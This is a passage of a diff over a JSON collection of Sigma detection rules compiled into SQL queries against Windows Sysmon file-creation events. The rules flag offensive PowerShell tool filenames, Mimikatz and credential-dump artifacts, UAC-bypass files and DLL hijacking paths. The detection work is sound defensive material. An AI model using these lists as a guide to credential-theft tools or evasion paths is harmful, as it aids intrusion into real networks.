ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-WebQuery.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Word.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Parse\\_Keys.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Port-Scan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerBreach.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\powercat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Powermad.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerRunAsSystem.psm1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerSharpPack.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerUp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerUpSQL.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerView.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PSAsyncShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\RemoteHashRetrieval.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-Persistence.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-PoshRat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-Update.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Run-EXEonRemote.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Schtasks-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-DCShadowPermissions.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-MacAttribute.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-RemotePSRemoting.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-RemoteWMI.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-Wallpaper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Show-TargetScreen.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Speak.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start-CaptureServer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start-WebcamRecorder.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\StringToBase64.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TexttoExe.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\VolumeShadowCopyTools.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinPwn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WSUSpendu.ps1' ESCAPE '\\') OR (TargetFilename LIKE '%Invoke-Sharp%' ESCAPE '\\' AND TargetFilename LIKE '%.ps1' ESCAPE '\\')))" ], - "filename": "win_security_aadhealth_mon_agent_regkey_access.yml" + "filename": "file_event_win_powershell_exploit_scripts.yml" }, { - "title": "Scanner PoC for CVE-2019-0708 RDP RCE Vuln", - "id": "8400629e-79a9-4737-b387-5db940ab2367", + "title": "Octopus Scanner Malware", + "id": "805c55d9-31e6-4846-9878-c34c75054fe9", "status": "test", - "description": "Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to CVE-2019-0708 RDP RCE aka BlueKeep", - "author": "Florian Roth (Nextron Systems), Adam Bradbury (idea)", + "description": "Detects Octopus Scanner Malware.", + "author": "NVISO", "tags": [ - "attack.lateral_movement", - "attack.t1210", - "car.2013-07-002" + "attack.t1195", + "attack.t1195.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4625' AND TargetUserName = 'AAAAAAA')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Cache134.dat' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\ExplorerSync.db' ESCAPE '\\'))" ], - "filename": "win_security_rdp_bluekeep_poc_scanner.yml" + "filename": "file_event_win_mal_octopus_scanner.yml" }, { - "title": "Password Protected ZIP File Opened", - "id": "00ba9da1-b510-4f6b-b258-8d338836180f", + "title": "Potential Initial Access via DLL Search Order Hijacking", + "id": "dbbd9f66-2ed3-4ca2-98a4-6ea985dd1a1c", "status": "experimental", - "description": "Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects attempts to create a DLL file to a known desktop application dependencies folder such as Slack, Teams or OneDrive and by an unusual process. This may indicate an attempt to load a malicious module via DLL search order hijacking.", + "author": "Tim Rauch (rule), Elastic (idea)", + "tags": [ + "attack.t1566", + "attack.t1566.001", + "attack.initial_access", + "attack.t1574", + "attack.t1574.001", + "attack.defense_evasion" + ], "falsepositives": [ - "Legitimate used of encrypted ZIP files" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\') AND NOT (TargetName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR Image LIKE '%\\\\MSPUB.EXE' ESCAPE '\\' OR Image LIKE '%\\\\fltldr.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%.dll' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft OneDrive\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Local\\\\slack\\\\app-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\%' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\api-ms-win-core-%' ESCAPE '\\'))" ], - "filename": "win_security_susp_opened_encrypted_zip.yml" + "filename": "file_event_win_initial_access_dll_search_order_hijacking.yml" }, { - "title": "DCERPC SMB Spoolss Named Pipe", - "id": "214e8f95-100a-4e04-bb31-ef6cba8ce07e", - "status": "test", - "description": "Detects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled.", - "author": "OTR (Open Threat Research)", + "title": "Suspicious LNK Double Extension Files", + "id": "3215aa19-f060-4332-86d5-5602511f3ca8", + "status": "experimental", + "description": "Detects dropped files with LNK double extension, which is often used by malware as a method to abuse the fact that windows hide default extensions by default.", + "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.defense_evasion", + "attack.t1036.007" ], "falsepositives": [ - "Domain Controllers acting as printer servers too? :)" + "Users creating a shortcut on e.g. desktop" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'spoolss')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%.lnk' ESCAPE '\\' AND (TargetFilename LIKE '%.doc.%' ESCAPE '\\' OR TargetFilename LIKE '%.docx.%' ESCAPE '\\' OR TargetFilename LIKE '%.xls.%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx.%' ESCAPE '\\' OR TargetFilename LIKE '%.ppt.%' ESCAPE '\\' OR TargetFilename LIKE '%.pptx.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpg.%' ESCAPE '\\' OR TargetFilename LIKE '%.pdf.%' ESCAPE '\\')) AND NOT (((TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Office\\\\Recent\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Recent\\\\%' ESCAPE '\\')) OR (Image LIKE '%\\\\excel.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Excel%' ESCAPE '\\') OR (Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\PowerPoint%' ESCAPE '\\') OR (Image LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Word%' ESCAPE '\\')))" ], - "filename": "win_security_dce_rpc_smb_spoolss_named_pipe.yml" + "filename": "file_event_win_susp_lnk_double_extension.yml" }, { - "title": "Local User Creation", - "id": "66b6be3d-55d0-4f47-9855-d69df21740ea", - "status": "test", - "description": "Detects local user creation on windows servers, which shouldn't happen in an Active Directory environment. Apply this Sigma Use Case on your windows server logs and not on your DC logs.", - "author": "Patrick Bareiss", + "title": "Potential RipZip Attack on Startup Folder", + "id": "a6976974-ea6f-4e97-818e-ea08625c52cb", + "status": "experimental", + "description": "Detects a phishing attack which expands a ZIP file containing a malicious shortcut.\nIf the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder.\nAdditionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation.\n", + "author": "Greg (rule)", "tags": [ "attack.persistence", - "attack.t1136.001" + "attack.t1547" ], "falsepositives": [ - "Domain Controller Logs", - "Local accounts managed by privileged account management tools" + "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4720')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup%' ESCAPE '\\' AND TargetFilename LIKE '%.lnk.{0AFACED1-E828-11D1-9187-B532F1E9575D}%' ESCAPE '\\' AND Image LIKE '%\\\\explorer.exe' ESCAPE '\\')" ], - "filename": "win_security_user_creation.yml" + "filename": "file_event_win_ripzip_attack.yml" }, { - "title": "CVE-2021-1675 Print Spooler Exploitation IPC Access", - "id": "8fe1c584-ee61-444b-be21-e9054b229694", - "status": "experimental", - "description": "Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527", - "author": "INIT_6", + "title": "Potential Persistence Via Microsoft Office Add-In", + "id": "8e1cb247-6cf6-42fa-b440-3f27d57e9936", + "status": "test", + "description": "Detects potential persistence activity via startup add-ins that load when Microsoft Office starts (.wll/.xll are simply .dll fit for Word or Excel).", + "author": "NVISO", "tags": [ - "attack.execution", - "attack.t1569", - "cve.2021.1675", - "cve.2021.34527" + "attack.persistence", + "attack.t1137.006" ], "falsepositives": [ - "Unknown" + "Legitimate add-ins" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'spoolss' AND AccessMask = '0x3' AND ObjectType = 'File')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\Microsoft\\\\Word\\\\Startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.wll' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Microsoft\\\\Excel\\\\Startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.xll' ESCAPE '\\') OR (TargetFilename LIKE '%Microsoft\\\\Excel\\\\XLSTART\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.xlam' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Microsoft\\\\Addins\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.xlam' ESCAPE '\\' OR TargetFilename LIKE '%.xla' ESCAPE '\\' OR TargetFilename LIKE '%.ppam' ESCAPE '\\'))))" ], - "filename": "win_security_exploit_cve_2021_1675_printspooler_security.yml" + "filename": "file_event_win_office_addin_persistence.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher - Security", - "id": "dcf2db1f-f091-425b-a821-c05875b8925a", + "title": "Creation of a Diagcab", + "id": "3d0ed417-3d94-4963-a562-4a92c940656a", "status": "experimental", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects the creation of diagcab file, which could be caused by some legitimate installer or is a sign of exploitation (review the filename and its location)", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.resource_development" ], "falsepositives": [ - "Unknown" + "Legitimate microsoft diagcab" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%\"set%' ESCAPE '\\' AND ServiceFileName LIKE '%-f%' ESCAPE '\\' AND (ServiceFileName LIKE '%/c%' ESCAPE '\\' OR ServiceFileName LIKE '%/r%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%.diagcab' ESCAPE '\\')" ], - "filename": "win_security_invoke_obfuscation_var_services_security.yml" + "filename": "file_event_win_susp_diagcab.yml" }, { - "title": "Service Installed By Unusual Client - Security", - "id": "c4e92a97-a9ff-4392-9d2d-7a4c642768ca", - "status": "experimental", - "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", - "author": "Tim Rauch", + "title": "UAC Bypass Using Windows Media Player - File", + "id": "68578b43-65df-4f81-9a9b-92f32711a951", + "status": "test", + "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1543" + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ClientProcessId = '0' OR ParentProcessId = '0'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\OskSupport.dll' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\DllHost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\')))" ], - "filename": "win_security_service_installation_by_unusal_client.yml" + "filename": "file_event_win_uac_bypass_wmp.yml" }, { - "title": "Outgoing Logon with New Credentials", - "id": "def8b624-e08f-4ae1-8612-1ba21190da6b", + "title": "Office Template Creation", + "id": "0e20c89d-2264-44ae-8238-aeeaba609ece", "status": "experimental", - "description": "Detects logon events that specify new credentials", + "description": "Detects creation of template files for Microsoft Office from outside Office", "author": "Max Altgelt (Nextron Systems)", + "tags": [ + "attack.persistence", + "attack.t1137" + ], "falsepositives": [ - "Legitimate remote administration activity" + "Loading a user environment from a backup or a domain controller", + "Synchronization of templates" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((TargetFilename LIKE '%.dot' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.doc' ESCAPE '\\' OR TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.rtf' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Word\\\\Startup%' ESCAPE '\\') OR ((TargetFilename LIKE '%.xlt' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.xls' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Excel\\\\Startup%' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\WINWORD.exe' ESCAPE '\\' OR Image LIKE '%\\\\EXCEL.exe' ESCAPE '\\')))" ], - "filename": "win_security_susp_logon_newcredentials.yml" + "filename": "file_event_win_word_template_creation.yml" }, { - "title": "SAM Registry Hive Handle Request", - "id": "f8748f2c-89dc-4d95-afb0-5a2dfdbad332", + "title": "Mimikatz Kirbi File Creation", + "id": "9e099d99-44c2-42b6-a6d8-54c3545cab29", "status": "test", - "description": "Detects handles requested to SAM registry hive", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects the creation of files created by mimikatz such as \".kirbi\", \"mimilsa.log\", etc.", + "author": "Florian Roth (Nextron Systems), David ANDRE", "tags": [ - "attack.discovery", - "attack.t1012", "attack.credential_access", - "attack.t1552.002" + "attack.t1558" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4656' AND ObjectType = 'Key' AND ObjectName LIKE '%\\\\SAM' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%.kirbi' ESCAPE '\\' OR TargetFilename LIKE '%mimilsa.log' ESCAPE '\\'))" ], - "filename": "win_security_sam_registry_hive_handle_request.yml" + "filename": "file_event_win_hktl_mimikatz_files.yml" }, { - "title": "Possible DC Shadow Attack", - "id": "32e19d25-4aed-4860-a55a-be99cb0bf7ed", + "title": "Legitimate Application Dropped Executable", + "id": "f0540f7e-2db3-4432-b9e0-3965486744bc", "status": "experimental", - "description": "Detects DCShadow via create new SPN", - "author": "Ilyas Ochkov, oscd.community, Chakib Gzenayi (@Chak092), Hosni Mribah", + "description": "Detects programs on a Windows system that should not write executables to disk", + "author": "frack113, Florian Roth", "tags": [ - "attack.credential_access", - "attack.t1207" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Valid on domain controllers; exclude known DCs" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4742' AND ServicePrincipalNames LIKE '%GC/%' ESCAPE '\\') OR (EventID = '5136' AND AttributeLDAPDisplayName = 'servicePrincipalName' AND AttributeValue LIKE 'GC/%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR Image LIKE '%\\\\visio.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordview.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR Image LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR Image LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR Image LIKE '%\\\\finger.exe' ESCAPE '\\' OR Image LIKE '%\\\\notepad.exe' ESCAPE '\\' OR Image LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR Image LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\'))" ], - "filename": "win_security_possible_dc_shadow.yml" + "filename": "file_event_win_legitimate_app_dropping_exe.yml" }, { - "title": "DCOM InternetExplorer.Application Iertutil DLL Hijack - Security", - "id": "c39f0c81-7348-4965-ab27-2fde35a1b641", + "title": "UAC Bypass Abusing Winsat Path Parsing - File", + "id": "155dbf56-e0a4-4dd0-8905-8a98705045e8", "status": "test", - "description": "Detects a threat actor creating a file named `iertutil.dll` in the `C:\\Program Files\\Internet Explorer\\` directory over the network for a DCOM InternetExplorer DLL Hijack scenario.", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", + "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1021.003" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND RelativeTargetName LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winsat.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winmm.dll' ESCAPE '\\'))" ], - "filename": "win_security_dcom_iertutil_dll_hijack.yml" + "filename": "file_event_win_uac_bypass_winsat.yml" }, { - "title": "Kerberos Manipulation", - "id": "f7644214-0eb0-4ace-9455-331ec4c09253", + "title": "Cred Dump Tools Dropped Files", + "id": "8fbf3271-1ef6-4e94-8210-03c2317947f6", "status": "test", - "description": "This method triggers on rare Kerberos Failure Codes caused by manipulations of Kerberos messages", - "author": "Florian Roth (Nextron Systems)", + "description": "Files with well-known filenames (parts of credential dump software or files produced by them) creation", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ "attack.credential_access", - "attack.t1212" + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.003", + "attack.t1003.004", + "attack.t1003.005" ], "falsepositives": [ - "Faulty legacy applications" + "Legitimate Administrator using tool for password recovery" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('675', '4768', '4769', '4771') AND FailureCode IN ('0x9', '0xA', '0xB', '0xF', '0x10', '0x11', '0x13', '0x14', '0x1A', '0x1F', '0x21', '0x22', '0x23', '0x24', '0x26', '0x27', '0x28', '0x29', '0x2C', '0x2D', '0x2E', '0x2F', '0x31', '0x32', '0x3E', '0x3F', '0x40', '0x41', '0x43', '0x44'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\pwdump%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\kirbi%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwhashes%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wce\\_ccache%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wce\\_krbtkts%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fgdump-log%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\test.pwd' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsremora64.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsremora.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fgexec.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wceaux.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SECURITY.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SYSTEM.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\NTDS.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DumpExt.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DumpSvc.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cachedump64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cachedump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pstgdump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\servpw.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\servpw64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwdump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Dumpy.exe' ESCAPE '\\')))" ], - "filename": "win_security_susp_kerberos_manipulation.yml" + "filename": "file_event_win_cred_dump_tools_dropped_files.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA - Security", - "id": "9b8d9203-4e0f-4cd9-bb06-4cc4ea6d0e9a", - "status": "experimental", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Creation Exe for Service with Unquoted Path", + "id": "8c3c76ca-8f8b-4b1d-aaf3-81aebcd367c9", + "status": "test", + "description": "Adversaries may execute their own malicious payloads by hijacking vulnerable file path references.\nAdversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.t1547.009" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%mshta%' ESCAPE '\\' AND ServiceFileName LIKE '%vbscript:createobject%' ESCAPE '\\' AND ServiceFileName LIKE '%.run%' ESCAPE '\\' AND ServiceFileName LIKE '%window.close%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\program.exe' ESCAPE '\\')" ], - "filename": "win_security_invoke_obfuscation_via_use_mshta_services_security.yml" + "filename": "file_event_win_creation_unquoted_service_path.yml" }, { - "title": "PetitPotam Suspicious Kerberos TGT Request", - "id": "6a53d871-682d-40b6-83e0-b7c1a6c4e3a5", + "title": "Suspicious Process Writes Ntds.dit", + "id": "11b1ed55-154d-4e82-8ad7-83739298f720", "status": "experimental", - "description": "Detect suspicious Kerberos TGT requests.\nOnce an attacer obtains a computer certificate by abusing Active Directory Certificate Services in combination with PetitPotam, the next step would be to leverage the certificate for malicious purposes.\nOne way of doing this is to request a Kerberos Ticket Granting Ticket using a tool like Rubeus.\nThis request will generate a 4768 event with some unusual fields depending on the environment.\nThis analytic will require tuning, we recommend filtering Account_Name to the Domain Controller computer accounts.\n", - "author": "Mauricio Velazco, Michael Haag", + "description": "Detects suspicious processes that write (copy) a Active Directory database (ntds.dit) file", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1187" + "attack.t1003.002", + "attack.t1003.003" ], "falsepositives": [ - "False positives are possible if the environment is using certificates for authentication. We recommend filtering Account_Name to the Domain Controller computer accounts." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4768' AND TargetUserName LIKE '%$' ESCAPE '\\' AND CertThumbprint LIKE '%' ESCAPE '\\') AND NOT ((IpAddress = '::1') OR (CertThumbprint = '')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\ntds.dit' ESCAPE '\\' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE 